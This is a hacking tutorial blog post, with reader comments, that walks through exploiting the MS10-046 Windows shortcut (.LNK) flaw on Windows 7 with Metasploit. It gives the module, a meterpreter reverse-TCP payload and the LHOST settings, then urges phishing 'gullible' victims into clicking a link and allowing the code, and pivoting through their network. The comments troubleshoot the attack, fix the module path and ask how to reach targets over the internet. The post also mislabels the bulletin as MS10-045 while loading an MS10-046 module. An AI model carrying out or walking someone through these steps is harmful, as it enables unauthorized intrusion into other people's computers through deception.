How to Hack Windows 7: Sending Vulnerable Shortcut Files

Sending Vulnerable Shortcut Files

Welcome back, my greenhorn hackers!

After the disaster that was Windows Vista and the limited and reluctant adoption of Windows 8 and 8.1, Windows 7 has become the de facto standard operating system on the desktop/client.

Although the most valuable information to the hacker resides on servers, sometimes the best way to get to a fortified server is through a vulnerable client on the same network with inexperienced and gullible users and numerous insecure applications.

Beginning with this tutorial, I will be showing you numerous ways to attack and exploit Windows 7. I already have a tutorial on sending a malicious link that can be used against Internet Explorer 8 on Windows XP, Vista, Server 2003, Server 2008 and Windows 7, and another on how to crash Windows 7 by creating an infinite loop.

Microsoft finally got the message that they need to make their operating systems more secure and they have done so. Attacking their operating systems has become increasingly difficult. Fortunately, for the hacker, the same cannot be said for their browser, Office Suite, and other apps, as well as all of the third-party applications that reside on the typical client system and, sometimes—on the server.

We will focus on attacking those vulnerabilities in the browser and the apps on Windows 7 in order to gain access and own those systems in the following "How to Hack Windows 7" series of tutorials. In this installment, we'll be sending a malicious link thanks to a vulnerability in the handling of Windows Shortcut files.

Step 1: Open Metasploit

Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing:

  • bt > msfconsole

You will be greeted by a screen like this.

Step 2: Load the Exploit

In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let's load it by typing:

  • msf > use windows/ms10_046_shortcut_icon_dllloader

Step 3: Get the Info

Now that we have it loaded in the Metasploit framework, let's get more info on this exploit to better understand what we will be doing.

  • msf > info

As we can read at the bottom, the developer of the exploit writes:

"This module exploits a vulnerability in the handling of Windows Shortcut file (.LNK) that contain an icon resource pointing to a malicious DLL."

Essentially, we will be creating a shortcut file, that when clicked on by a gullible end user, will allow the execution of our malicious code.

Step 4: Set the Options

With the exploit loaded and the knowledge of how it works, let's set the required options. First, set the Payload. My preference is the great and powerful (sounds like Oz) Meterpreter.

  • set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the IP our our system as LHOST:

  • set LHOST 192.168.1.111

Once we have these options set, we can simply type "exploit" to generate the exploit. Unlike some of our other remote exploits, what we've done here is generate a link and a server to host that link.

As you can see where I have highlighted in the above screenshot, Metasploit has generated the exploit and then started a server to host the exploit. Our job now is to get the victim to click on the link.

Step 5: Send the Link to the Victim

We need to be creative here. This is the social engineering part of this hack. One way or another, we need to induce the victim to click on our link.

We've all seen those spam emails that claim to help us acquire a small fortune by working at home, grow our penises to proportions that would make a stallion envious, and apply for millions of dollars in unclaimed bank funds. Or, it could simply be something as innocent-sounding as watching a hilarious cat video. If we click on any of the links, we're likely to become a victim of a hack like this one.

You might say "no one would be so gullible," but in reality, there are billions of such gullible people. Some of the greatest hacks in history (RSA and NY Times come immediately to mind) have been accomplished this way. When all is said and done, I believe that the hackers who gained access to the credit cards numbers at Target gained their foothold inside that network by getting one unwitting employee to click on a link such as this.

So...we have the link and the victim clicks on it like in the screenshot below.

Now, here is the crucial and tricky part...

The victim will be greeted by a security warning. The victim must "Allow" the code to run. Many, or probably most users will know better than to "Allow," but it only requires one user of thousands to compromise an entire network. Make the link sound compelling enough and SOMEONE will click "Allow," especially if it comes from someone they know or think they know and trust.

Step 6: Sends the Exploit and Payload

When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. In my experience, even on an unpatched Windows 7 system, it does not always work, so be persistent. Persistence and creativity are key attributes of a successful hacker.

Step 7: Success!

If we have done everything correctly and the victim is vulnerable and naive, we will be greeted by the meterpreter prompt!

Now that we have control of this Windows 7 system, we can do just about anything we want with this computer. Far more importantly, if this machine is on a large network, we can pivot from it to take control of any other system on the network.

Keep coming back, my greenhorn hackers, for more on hacking Windows 7 systems.

60 Comments

I'll try soon I hope it works well

@Bart Capel

Your code has a syntax error it should be..

use windows/browser/ms10_046_shortcut_icon_dllloader
:)

All The Best

exploit/windows/browser/ms10046shortcuticondllloader
if you using kali

specifically

use exploit/windows/browser/ms10-046-shortcut-icon-dllloader

replace the dashes with underscores, for some reason its not letting me put them in

exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Did you read the message there from Metasploit? Your anti-virus has corrupted Metasploit.

i'm getting unknown command on the first step... using bt5 on vmware player

yeah got it right... u might wanna correct the command in the second step for others

can a single link be send to multiple targets?? if not then how to create multiple servers??

now i just have to send the link?? the first one??

the link is not working... i have made it like 10 times.. tried to open at another cmp on another net but it does not opens any security warning like thing??? any idea where i might have gone wrong

As our enlightened friend (ARSLAN) here has pointed out the prompt given in the text is wrong should be "use windows/browser/ms10046shortcuticondllloader" (it is noted in the screen shot though guys if you had looked....also given that its a BROWSER exploit.... Give Master OTW the credit he deserves!!)

Although in other news its worth noting that the "host/anything.lnk" seems to be the way to get this to send

on another note Master, would it be possible to embed the meterpreter into a .pdf and serve it from the server built by this exploit?

If so how would we change what the server reference points to?

Existing:

Yes, but they would have to choose to downlaod the pdf.

OTW

i'm a newbie so a lot of questions... :P
do the link works only for the target on the same network connection or everyone??
also is it necessary for the target to open the link in IE??

It will work on any IP, but only on IE.

hmm so is there any method for chrome and other browser??

will u point me in the right direction... any tutorial??

I dont have a tutorial up yet, but you can find the exploits by using metasploits search function.

Search chrome

hmm and one final Q.. do u prefer kali or backtrack??

link is not working on internet for me..i tried from my friends computer...please help me..waiting for rply

Thanks in Advance..

i will have to commend you on your tutorials occupyt hewb. there are very understanding and straight forward. thanks. but am been face with a problem i dont understand after i i dont everything and i test it on my windows 7. in my kali i keep getting 'ms10046shortcuticondllloader - Sending UNC redirect' and it never stops. is that it is not vulnerable or what is the cuase. in the metasploit options it say 'UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).' i dont understand it. please help me.

Jude:

Can you send a screenshot?

OTW

me also faccing the same issue..its keeps sending UNC redirect..PFA for the same

Please help me in this..

Hi, I'm new here!

I did all the things with my Kali system and on my other machine with Windows7 I opened the link in InternetExplorer.
The console on my Kali says:

ms10046shortcuticondllloader - Sending directory multistatus for /jNUOe/ ...

But then nothing happens, what do I have to do now ?
And is it only working with IE or with FireFox or Chrome too ?

Thanks, guys!

Noob:

Can you post a screenshot? There are so many reasons this might fail, but a screenshot might give us a hint.

OTW

Now I tried it again and the nothing happends after that, what did I wrong ?

My conclusion: It ought to work just on internal networks cause I tested both possibilities and only one had a response. Moreover I think this is no longer a feasable exploit.

About that "Sending UNC redirect" stuck message that a lot of us are getting with this, I've realized something: it only shows on your Terminal if you send the link with "/" instead of "\", for instance "//192.168.1.16/anything/" instead of "\\192.168.1.16\anything\". Both of them opens Windows Explorer where you can see the dll and the lnk files being created, although if you use "\" the Internet Explorer doesn't ask for your permission to open the link, which I find kind of strange... Does this hack work with both ways? I just found the differences, I'm still just a noob with Linux, Kali, Metasploit, Meterpreter and anything beyond Microsoft Windows itself.

Hello, guys

I am getting the same message

192.168.1.105 ms10046shortcuticondllloader - Sending UNC redirect
192.168.1.105 ms10046shortcuticondllloader - Sending UNC redirect

is there any solution for this..

Did you follow the directions?

You can look at my screen shots I have done every thing exactly in the tutorial...

Image via umarstudio.com

and when the link is clicked i get this..

Image via umarstudio.com

I dont know what i m doing wrong here maybe its the LHOST i typing it wrong...

Thanks

Yes sir ... I swear i did ;-P

Please anyone can tell me whats going on here i tried it many times getting the same results...

Hi, have you tried to add: set SRVHOST 192.168.1.104 ?

Thanks for the reply...

it worked here is the result but it is stuck on
Sending directory multistatus for / ...

for long time any suggestions why

Image via umarstudio.com

You are using the same LHOST & SRVHOST IP , yes?

  1. SRVHOST
  2. Payload
  3. LHOST
  4. exploit

Where it's dying is where you get the meterpreter .

Yes I am using the same LHOST & SRVHOST (192.168.1.104)

I did exactly the same steps 1 to 4 ... and at the end where it is stuck i m suppose to get the meterpreter ... is there any other way to do this..

but later today i will try to do it again.

Hello,

I am still not getting the meterpreter any suggestions.
when the link is clicked it always gets stuck at different places as in the screenshot.

Image via umarstudio.com

Hallo, What version of Windows are you using this on?

Never mind, Duh... If the machine has KB2286198 this exploit is dead.

ok.. cool so this is not going to work unless someone is not updated.

but i have one question that normally I set LHOST address (192.168.1.104 ) and it works locally i checked it on the computer outside my localhost it did not work...

what should I set LHOST address to so that it works on WAN..

thanks

Would this hack work on Windows XP SP3? (I tried a Windows XP hack, but the SP3 update fixed it.) {Trying to hack an extra computer I have at my house, for practice}

When I did it instead of sending anything it kept saying 'redirecting' or something like that and on the hosted site there wasn't an allow/don't allow popup there was just a crap ton of reloading ads. This might have something to do with my flash player being disabled ... maybe. Also I was wondering if you could change the background of the page to look like a trusted site.

i get this... after this nothing happens

after getting the meterpreter how can i get to cmd?

use the command 'shell' once you are in the session

Ive searched for MS10045 and the only 2 exploits i could find was :
exploit/windows/email/ms10
045outlookrefonly

and

exploit/windows/email/ms10045outlookrefresolve

Share Your Thoughts

  • Hot
  • Latest